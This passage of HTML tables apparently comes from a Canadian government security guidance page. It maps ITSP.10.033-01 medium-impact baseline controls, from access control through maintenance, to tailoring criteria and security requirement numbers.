</tr><tr><td>AC-06(09)</td> <td>Least privilege: Log use of privileged functions</td> <td>C</td> <td><a href="#03-01-07">Privileged accounts – privileged functions 03.01.07</a></td> </tr><tr><td>AC-06(10)</td> <td>Least privilege: Prohibit non-privileged users from executing privileged functions</td> <td>C</td> <td><a href="#03-01-07">Privileged accounts – privileged functions 03.01.07</a></td> </tr><tr><td>AC-07</td> <td>Unsuccessful logon attempts</td> <td>C</td> <td><a href="#03-01-08">Unsuccessful logon attempts 03.01.08</a></td> </tr><tr><td>AC-08</td> <td>System use notification</td> <td>C</td> <td><a href="#03-01-09">System use notification 03.01.09</a></td> </tr><tr><td>AC-11</td> <td>Device lock</td> <td>C</td> <td><a href="#03-01-10">Device lock 03.01.10</a></td> </tr><tr><td>AC-11(01)</td> <td>Device lock: Pattern-hiding displays</td> <td>C</td> <td><a href="#03-01-10">Device lock 03.01.10</a></td> </tr><tr><td>AC-12</td> <td>Session termination</td> <td>C</td> <td><a href="#03-01-11">Session termination 03.01.11</a></td> </tr><tr><td>AC-14</td> <td>Permitted actions without identification or authentication</td> <td>GC</td> <td>none</td> </tr><tr><td>AC-16</td> <td>Security and privacy attributes</td> <td>ORC</td> <td>none</td> </tr><tr><td>AC-16(02)</td> <td>Security and privacy attributes: Attribute value changes by authorized individuals</td> <td>ORC</td> <td>none</td> </tr><tr><td>AC-16(05)</td> <td>Security and privacy attributes: Attribute displays on objects to be output</td> <td>ORC</td> <td>none</td> </tr><tr><td>AC-17</td> <td>Remote access</td> <td>C</td> <td><a href="#03-01-02">Access enforcement 03.01.02</a></td> </tr><tr><td>AC-17(01)</td> <td>Remote access: Monitoring and control</td> <td>NCO</td> <td>none</td> </tr><tr><td>AC-17(02)</td> <td>Remote access: Protection of confidentiality and integrity using encryption</td> <td>C</td> <td><a href="#03-13-08">Transmission and storage confidentiality 03.13.08</a></td> </tr><tr><td>AC-17(03)</td> <td>Remote access: Managed access control points</td> <td>C</td> <td><a href="#03-01-12">Remote access 03.01.12</a></td> </tr><tr><td>AC-17(04)</td> <td>Remote access: Privileged commands and access</td> <td>C</td> <td><a href="#03-01-12">Remote access 03.01.12</a></td> </tr><tr><td>AC-17(400)</td> <td>Remote access: Privileged accounts remote access</td> <td>ORC</td> <td>none</td> </tr><tr><td>AC-18</td> <td>Wireless access</td> <td>C</td> <td><a href="#03-01-16">Wireless access 03.01.16</a></td> </tr><tr><td>AC-18(01)</td> <td>Wireless access: Authentication and encryption</td> <td>C</td> <td><a href="#03-01-16">Wireless access 03.01.16</a></td> </tr><tr><td>AC-18(03)</td> <td>Wireless access: Disable wireless networking</td> <td>C</td> <td><a href="#03-01-16">Wireless access 03.01.16</a></td> </tr><tr><td>AC-18(04)</td> <td>Wireless access: Restrict configurations by users</td> <td>ORC</td> <td>none</td> </tr><tr><td>AC-19</td> <td>Access control for mobile devices</td> <td>C</td> <td><a href="#03-01-18">Access control for mobile devices 03.01.18</a></td> </tr><tr><td>AC-19(05)</td> <td>Access control for mobile devices: Full device or container-based encryption</td> <td>C</td> <td><a href="#03-01-18">Access control for mobile devices 03.01.18</a></td> </tr><tr><td>AC-20</td> <td>Use of external systems</td> <td>C</td> <td><a href="#03-01-20">Use of external systems 03.01.20</a></td> </tr><tr><td>AC-20(01)</td> <td>Use of external systems: Limits on authorized use</td> <td>C</td> <td><a href="#03-01-20">Use of external systems 03.01.20</a></td> </tr><tr><td>AC-20(02)</td> <td>Use of external systems: Portable storage devices – restricted use</td> <td>C</td> <td><a href="#03-01-20">Use of external systems 03.01.20</a></td> </tr><tr><td>AC-20(04)</td> <td>Use of external systems: Network accessible storage devices – restricted use</td> <td>ORC</td> <td>none</td> </tr><tr><td>AC-21</td> <td>Information sharing</td> <td>GC</td> <td>none</td> </tr><tr><td>AC-21(400)</td> <td>Information sharing: Information sharing agreement</td> <td>GC</td> <td>none</td> </tr><tr><td>AC-21(401)</td> <td>Information sharing: Information sharing arrangement</td> <td>GC</td> <td>none</td> </tr><tr><td>AC-22</td> <td>Publicly accessible content</td> <td>C</td> <td><a href="#03-01-22">Publicly accessible content 03.01.22</a></td> </tr></tbody></table></div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab2"><caption>Table 2: Awareness and training</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>AT-01</td> <td>Awareness and training policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>AT-02</td> <td>Literacy training and awareness</td> <td>C</td> <td><a href="#03-02-01">Literacy training and awareness 03.02.01</a></td> </tr><tr><td>AT-02(02)</td> <td>Literacy training and awareness: Insider threat</td> <td>C</td> <td><a href="#03-02-01">Literacy training and awareness 03.02.01</a></td> </tr><tr><td>AT-02(03)</td> <td>Literacy training and awareness: Social engineering and mining</td> <td>C</td> <td><a href="#03-02-01">Literacy training and awareness 03.02.01</a></td> </tr><tr><td>AT-03</td> <td>Role-based training</td> <td>C</td> <td><a href="#03-02-02">Role-based training 03.02.02</a></td> </tr><tr><td>AT-04</td> <td>Training records</td> <td>NCO</td> <td>none</td> </tr></tbody></table></div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab3"><caption>Table 3: Audit and accountability</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>AU-01</td> <td>Audit and accountability policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>AU-02</td> <td>Event logging</td> <td>C</td> <td><a href="#03-03-01">Event logging 03.03.01</a></td> </tr><tr><td>AU-03</td> <td>Content of audit records</td> <td>C</td> <td><a href="#03-03-02">Audit record content 03.03.02</a></td> </tr><tr><td>AU-03(01)</td> <td>Additional audit information</td> <td>C</td> <td><a href="#03-03-02">Audit record content 03.03.02</a></td> </tr><tr><td>AU-04</td> <td>Audit log storage capacity</td> <td>NCO</td> <td>none</td> </tr><tr><td>AU-04(01)</td> <td>Audit log storage capacity: Transfer to alternate storage</td> <td>NCO</td> <td>none</td> </tr><tr><td>AU-05</td> <td>Response to audit logging process failures</td> <td>C</td> <td><a href="#03-03-04">Response to audit logging process failures 03.03.04</a></td> </tr><tr><td>AU-05(01)</td> <td>Response to audit logging process failures: Storage capacity warning</td> <td>NCO</td> <td>none</td> </tr><tr><td>AU-06</td> <td>Audit record review, analysis, and reporting</td> <td>C</td> <td><a href="#03-03-05">Audit record review, analysis, and reporting 03.03.05</a></td> </tr><tr><td>AU-06(01)</td> <td>Audit record review, analysis, and reporting: Automated process integration</td> <td>NCO</td> <td>none</td> </tr><tr><td>AU-06(03)</td> <td>Audit record review, analysis, and reporting: Correlate audit record repositories</td> <td>C</td> <td><a href="#03-03-05">Audit record review, analysis, and reporting 03.03.05</a></td> </tr><tr><td>AU-06(04)</td> <td>Audit record review, analysis, and reporting: Central review and analysis</td> <td>NCO</td> <td>none</td> </tr><tr><td>AU-07</td> <td>Audit record reduction and report generation</td> <td>C</td> <td><a href="#03-03-06">Audit record reduction and report generation 03.03.06</a></td> </tr><tr><td>AU-07(01)</td> <td>Audit record reduction and report generation: Automatic processing</td> <td>NCO</td> <td>none</td> </tr><tr><td>AU-08</td> <td>Time stamps</td> <td>C</td> <td><a href="#03-03-07">Time stamps 03.03.07</a></td> </tr><tr><td>AU-09</td> <td>Protection of audit information</td> <td>C</td> <td><a href="#03-03-08">Protection of audit information 03.03.08</a></td> </tr><tr><td>AU-09(02)</td> <td>Protection of audit information: Store on separate physical system or component</td> <td>NCO</td> <td>none</td> </tr><tr><td>AU-09(04)</td> <td>Protection of audit information: Access by subset of privileged users</td> <td>C</td> <td><a href="#03-03-08">Protection of audit information 03.03.08</a></td> </tr><tr><td>AU-09(06)</td> <td>Protection of audit information: Read-only access</td> <td>NCO</td> <td>none</td> </tr><tr><td>AU-11</td> <td>Audit record retention</td> <td>C</td> <td><a href="#03-03-03">Audit record generation 03.03.03</a></td> </tr><tr><td>AU-12</td> <td>Audit record generation</td> <td>C</td> <td><a href="#03-03-03">Audit record generation 03.03.03</a></td> </tr><tr><td>AU-12(01)</td> <td>Audit record generation: System-wide and time-correlated audit trail</td> <td>NCO</td> <td>none</td> </tr></tbody></table></div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab4"><caption>Table 4: Assessment, authorization, and monitoring (CA)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">TSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>CA-01</td> <td>Assessment, authorization, and monitoring policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>CA-02</td> <td>Control assessments</td> <td>C</td> <td><a href="#03-12-01">Security assessment 03.12.01</a></td> </tr><tr><td>CA-02(01)</td> <td>Control assessments: Independent assessors</td> <td>NCO</td> <td>none</td> </tr><tr><td>CA-03</td> <td>Information exchange</td> <td>C</td> <td><a href="#03-12-05">Information exchange 03.12.05</a></td> </tr><tr><td>CA-05</td> <td>Plan of action and milestones</td> <td>C</td> <td><a href="#03-12-02">Plan of action and milestones 03.12.02</a></td> </tr><tr><td>CA-06</td> <td>Authorization</td> <td>GC</td> <td>none</td> </tr><tr><td>CA-07</td> <td>Continuous monitoring</td> <td>C</td> <td><a href="#03-12-03">Continuous monitoring 03.12.03</a></td> </tr><tr><td>CA-07(01)</td> <td>Continuous monitoring: Independent assessment</td> <td>NCO</td> <td>none</td> </tr><tr><td>CA-07(04)</td> <td>Continuous monitoring: Risk monitoring</td> <td>NCO</td> <td>none</td> </tr><tr><td>CA-09</td> <td>Internal system connections</td> <td>NCO</td> <td>none</td> </tr><tr><td>CA-09(01)</td> <td>Internal system connections: Compliance checks</td> <td>ORC</td> <td>none</td> </tr></tbody></table></div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab5"><caption>Table 5: Configuration management (CM)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>CM-01</td> <td>Configuration management policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>CM-02</td> <td>Baseline configuration</td> <td>C</td> <td><a href="#03-04-01">Baseline configuration 03.04.01</a></td> </tr><tr><td>CM-02(02)</td> <td>Baseline configuration: Automation support for accuracy and currency</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-02(03)</td> <td>Baseline configuration: Retention of previous configurations</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-02(06)</td> <td>Baseline configuration: Development and test environments</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-02(07)</td> <td>Baseline configuration: Configure systems and components for high-risk areas</td> <td>C</td> <td><a href="#03-04-12">System and component configuration for high-risk areas 03.04.12</a></td> </tr><tr><td>CM-03</td> <td>Configuration change control</td> <td>C</td> <td><a href="#03-04-03">Configuration change control 03.04.03</a></td> </tr><tr><td>CM-03(02)</td> <td>Configuration change control: Testing, validation, and documentation of changes</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-03(04)</td> <td>Configuration change control: Security and privacy representatives</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-04</td> <td>Impact analyses</td> <td>C</td> <td><a href="#03-04-04">Impact analyses 03.04.04</a></td> </tr><tr><td>CM-04(01)</td> <td>Impact analyses: Separate test environments</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-04(02)</td> <td>Impact analyses: Verification of controls</td> <td>C</td> <td><a href="#03-04-04">Impact analyses 03.04.04</a></td> </tr><tr><td>CM-05</td> <td>Access restrictions for change</td> <td>C</td> <td><a href="#03-04-05">Access restrictions for change 03.04.05</a></td> </tr><tr><td>CM-06</td> <td>Configuration settings</td> <td>C</td> <td><a href="#03-04-02">Configuration settings 03.04.02</a></td> </tr><tr><td>CM-07</td> <td>Least functionality</td> <td>C</td> <td><a href="#03-04-06">Least functionality 03.04.06</a></td> </tr><tr><td>CM-07(01)</td> <td>Least functionality: Periodic review</td> <td>C</td> <td><a href="#03-04-06">Least functionality 03.04.06</a></td> </tr><tr><td>CM-07(02)</td> <td>Least functionality: Prevent program execution</td> <td>ORC</td> <td>none</td> </tr><tr><td>CM-07(05)</td> <td>Least functionality: Authorized software – allow by exception</td> <td>C</td> <td><a href="#03-04-08">Authorized software – allow by exception 03.04.08</a></td> </tr><tr><td>CM-08</td> <td>System component inventory</td> <td>C</td> <td><a href="#03-04-10">System component inventory 03.04.10</a></td> </tr><tr><td>CM-08(01)</td> <td>System component inventory: Updates during installation and removal</td> <td>C</td> <td><a href="#03-04-10">System component inventory 03.04.10</a></td> </tr><tr><td>CM-08(03)</td> <td>System component inventory: Automated unauthorized component detection</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-08(04)</td> <td>System component inventory: Accountability information</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-08(06)</td> <td>System component inventory: Assessed configurations and approved deviations</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-09</td> <td>Configuration management plan</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-10</td> <td>Software usage restrictions</td> <td>NCO</td> <td>none</td> </tr><tr><td>CM-11</td> <td>User-installed software</td> <td>ORC</td> <td>none</td> </tr><tr><td>CM-11(02)</td> <td>User-installed software: Software installation with privileged status</td> <td>ORC</td> <td>none</td> </tr><tr><td>CM-12</td> <td>Information location</td> <td>C</td> <td><a href="#03-04-11">Information location 03.04.11</a></td> </tr><tr><td>CM-12(01)</td> <td>Information location: Automated tools to support information location</td> <td>NCO</td> <td>none</td> </tr></tbody></table></div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab6"><caption>Table 6: Contingency planning (CP)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>CP-01</td> <td>Contingency planning policy and procedures</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-02</td> <td>Contingency plan</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-02(01)</td> <td>Contingency plan: Coordinate with related plans</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-02(02)</td> <td>Contingency plan: Capacity planning</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-02(03)</td> <td>Contingency plan: Resume mission and business functions</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-02(08)</td> <td>Contingency plan: Identify critical assets</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-03</td> <td>Contingency training</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-04</td> <td>Contingency plan testing</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-04(01)</td> <td>Contingency plan testing: Coordinate related plans</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-06</td> <td>Alternate storage site</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-06(01)</td> <td>Alternate storage site: Separation of primary site</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-06(03)</td> <td>Alternate storage site: Accessibility</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-07</td> <td>Alternate processing site</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-07(01)</td> <td>Alternate processing site: Separation of primary site</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-07(02)</td> <td>Alternate processing site: Accessibility</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-07(03)</td> <td>Alternate processing site: Priority of service</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-07(04)</td> <td>Alternate processing site: Preparation for use</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-07(06)</td> <td>Alternate processing site: Inability to return to primary site</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-08</td> <td>Telecommunications services</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-08(01)</td> <td>Telecommunications services: Priority of service provisions</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-08(02)</td> <td>Telecommunications services: Single points of failure</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-08(03)</td> <td>Telecommunications services: Separation of primary and alternate providers</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-08(05)</td> <td>Telecommunications services: Alternate telecommunication service testing</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-09</td> <td>System backup</td> <td>C</td> <td><a href="#03-08-09">System backup – cryptographic protection 03.08.09</a></td> </tr><tr><td>CP-09(01)</td> <td>System backup: Testing for reliability and integrity</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-09(03)</td> <td>System backup: Separate storage for critical information</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-09(05)</td> <td>System backup: Transfer to alternate storage site</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-09(07)</td> <td>System backup: Dual authorization for deletion or destruction</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-09(08)</td> <td>System backup: Cryptographic protection</td> <td>C</td> <td><a href="#03-08-09">System backup – cryptographic protection 03.08.09</a></td> </tr><tr><td>CP-10</td> <td>System recovery and reconstitution</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-10(02)</td> <td>System recovery and reconstitution: Transaction recovery</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-10(04)</td> <td>System recovery and reconstitution: Restore within time period</td> <td>NCO</td> <td>none</td> </tr><tr><td>CP-10(06)</td> <td>System recovery and reconstitution: Component protection</td> <td>NCO</td> <td>none</td> </tr></tbody></table></div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab7"><caption>Table 7: Identification and Authentication (IA)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>IA-01</td> <td>Identification and authentication policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>IA-02</td> <td>Identification and authentication (organizational users)</td> <td>C</td> <td><a href="#03-05-01">User identification, authentication, and re-authentication 03.05.01</a></td> </tr><tr><td>IA-02(01)</td> <td>Identification and authentication (organizational users): Multi-factor authentication to privileged accounts</td> <td>C</td> <td><a href="#03-05-03">Multi-factor authentication 03.05.03</a></td> </tr><tr><td>IA-02(02)</td> <td>Identification and authentication (organizational users): Multi-factor authentication to non-privileged accounts</td> <td>C</td> <td><a href="#03-05-03">Multi-factor authentication 03.05.03</a></td> </tr><tr><td>IA-02(08)</td> <td>Identification and authentication (organizational users): Access to accounts – replay resistant</td> <td>C</td> <td><a href="#03-05-04">Replay-resistant authentication 03.05.04</a></td> </tr><tr><td>IA-02(10)</td> <td>Identification and authentication (organizational users): Single sign-on</td> <td>NCO</td> <td>none</td> </tr><tr><td>IA-02(12)</td> <td>Identification and authentication (organizational users): Use of hardware token <abbr title="Government of Canada">GC</abbr>-issued <abbr title="Public Key Infrastructure">PKI</abbr>-based credentials</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-03</td> <td>Device identification and authentication</td> <td>C</td> <td><a href="#03-05-02">Device identification and authentication 03.05.02</a></td> </tr><tr><td>IA-04</td> <td>Identifier management</td> <td>C</td> <td><a href="#03-05-05">Identifier management 03.05.05</a></td> </tr><tr><td>IA-04(04)</td> <td>Identifier management: Identify user status</td> <td>C</td> <td><a href="#03-05-05">Identifier management 03.05.05</a></td> </tr><tr><td>IA-05</td> <td>Authenticator management</td> <td>C</td> <td><a href="#03-05-12">Authenticator management 03.05.12</a></td> </tr><tr><td>IA-05(01)</td> <td>Authenticator management: Password-based authentication</td> <td>C</td> <td><a href="#03-05-07">Password management 03.05.07</a></td> </tr><tr><td>IA-05(02)</td> <td>Authenticator management: Public key-based authentication</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-05(06)</td> <td>Authenticator management: Protection of authenticators</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-05(07)</td> <td>Authenticator management: No embedded unencrypted static authenticators</td> <td>NCO</td> <td>none</td> </tr><tr><td>IA-05(08)</td> <td>Authenticator management: Multiple system accounts</td> <td>NCO</td> <td>none</td> </tr><tr><td>IA-05(09)</td> <td>Authenticator management: Federated credential management</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-05(13)</td> <td>Authenticator management: Expiration of cached authenticators</td> <td>ORC</td> <td>none</td> </tr><tr><td>IA-05(14)</td> <td>Authenticator management: Managing content of <abbr title="Public Key Infrastructure">PKI</abbr> trust stores</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-06</td> <td>Authentication feedback</td> <td>C</td> <td><a href="#03-05-11">Authentication feedback 03.05.11</a></td> </tr><tr><td>IA-07</td> <td>Cryptographic module authentication</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-08</td> <td>Identification and authentication (non-organizational users)</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-08(01)</td> <td>Identification and authentication (non-organizational users): Acceptance of <abbr title="Public Key Infrastructure">PKI</abbr>-based credentials from other agencies</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-08(02)</td> <td>Identification and authentication (non-organizational users): Acceptance of external authenticators</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-08(04)</td> <td>Identification and authentication (non-organizational users): Use of defined profiles</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-11</td> <td>Re-authentication</td> <td>C</td> <td><a href="#03-05-01">User identification, authentication, and re-authentication 03.05.01</a></td> </tr><tr><td>IA-12</td> <td>Identity proofing</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-12(02)</td> <td>Identity proofing: Identity evidence</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-12(03)</td> <td>Identity proofing: Identity evidence validation and verification</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-12(04)</td> <td>Identity proofing: In-person validation and verification</td> <td>GC</td> <td>none</td> </tr><tr><td>IA-12(05)</td> <td>Identity proofing: Address confirmation</td> <td>GC</td> <td>none</td> </tr></tbody></table></div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab8"><caption>Table 8: Incident Response (IR)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>IR-01</td> <td>Incident response policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>IR-02</td> <td>Incident response training</td> <td>C</td> <td><a href="#03-06-04">Incident response training 03.06.04</a></td> </tr><tr><td>IR-03</td> <td>Incident response testing</td> <td>C</td> <td><a href="#03-06-03">Incident response testing 03.06.03</a></td> </tr><tr><td>IR-03(02)</td> <td>Incident response testing: Coordinate with related plans</td> <td>NCO</td> <td>none</td> </tr><tr><td>IR-04</td> <td>Incident handling</td> <td>C</td> <td><a href="#03-06-01">Incident handling 03.06.01</a></td> </tr><tr><td>IR-04(03)</td> <td>Incident handling: Continuity of operations</td> <td>NCO</td> <td>none</td> </tr><tr><td>IR-04(08)</td> <td>Incident handling: Correlation with external organizations</td> <td>NCO</td> <td>none</td> </tr><tr><td>IR-04(09)</td> <td>Incident handling: Dynamic response capability</td> <td>NCO</td> <td>none</td> </tr><tr><td>IR-05</td> <td>Incident monitoring</td> <td>C</td> <td><a href="#03-06-02">Incident monitoring, reporting, and response assistance 03.06.02</a></td> </tr><tr><td>IR-06</td> <td>Incident reporting</td> <td>C</td> <td><a href="#03-06-02">Incident monitoring, reporting, and response assistance 03.06.02</a></td> </tr><tr><td>IR-06(01)</td> <td>Incident reporting: Automated reporting</td> <td>NCO</td> <td>none</td> </tr><tr><td>IR-06(02)</td> <td>Incident reporting: Vulnerabilities related to incidents</td> <td>NCO</td> <td>none</td> </tr><tr><td>IR-06(03)</td> <td>Incident reporting: Supply chain coordination</td> <td>NCO</td> <td>none</td> </tr><tr><td>IR-07</td> <td>Incident response assistance</td> <td>C</td> <td><a href="#03-06-02">Incident monitoring, reporting, and response assistance 03.06.02</a></td> </tr><tr><td>IR-07(01)</td> <td>Incident response assistance: Automation support for availability of information and support</td> <td>NCO</td> <td>none</td> </tr><tr><td>IR-08</td> <td>Incident response plan</td> <td>C</td> <td><a href="#03-06-05">Incident response plan 03.06.05</a></td> </tr></tbody></table></div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab9"><caption>Table 9: Maintenance (MA)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>MA-01</td> <td>System maintenance policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>MA-02</td> <td>Controlled maintenance</td> <td>NCO</td> <td>none</td> </tr><tr><td>MA-03</td> <td>Maintenance tools</td> <td>C</td> <td><a href="#03-07-04">Maintenance tools 03.07.04</a></td> </tr><tr><td>MA-03(01)</td> <td>Maintenance tools: Inspect tools</td> <td>C</td> <td><a href="#03-07-04">Maintenance tools 03.07.04</a></td> </tr><tr><td>MA-03(02)</td> <td>Maintenance tools: Inspect media</td> <td>C</td> <td><a href="#03-07-04">Maintenance tools 03.07.04</a></td> </tr><tr><td>MA-03(03)</td> <td>Maintenance tools: Prevent unauthorized removal</td> <td>C</td> <td><a href="#03-07-04">Maintenance tools 03.07.04</a></td> </tr><tr><td>MA-04</td> <td>Non-local maintenance</td> <td>C</td> <td><a href="#03-07-05">Non-local maintenance 03.07.05</a></td> </tr><tr><td>MA-04(01)</td> <td>Non-local maintenance: Logging and review</td> <td>NCO</td> <td>none</td> </tr><tr><td>MA-04(03)</td> <td>Non-local maintenance: Comparable security and sanitization</td> <td>ORC</td> <td>none</td> </tr><tr><td>MA-04(04)</td> <td>Non-local maintenance: Authentication and separation of maintenance sessions</td> <td>ORC</td> <td>none</td> </tr><tr><td>MA-04(05)</td> <td>Non-local maintenance: Approvals and notifications</td> <td>ORC</td> <td>none</td> </tr><tr><td>MA-04(06)</td> <td>Non-local maintenance: Cryptographic protection</td> <td>ORC</td> <td>none</td> </tr><tr><td>MA-05</td> <td>Maintenance personnel</td> <td>C</td> <td><a href="#03-07-06">Maintenance personnel 03.07.06</a></td> </tr><tr><td>MA-05(01)</td> <td>Maintenance personnel: Individuals without appropriate access</td> <td>ORC</td> <td>none</td> </tr><tr><td>MA-06</td> <td>Timely maintenance</td> <td>NCO</td> <td>none</td> </tr></tbody></table></div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <div class="table-responsive col-md-12"> <table class="table table-bordered" 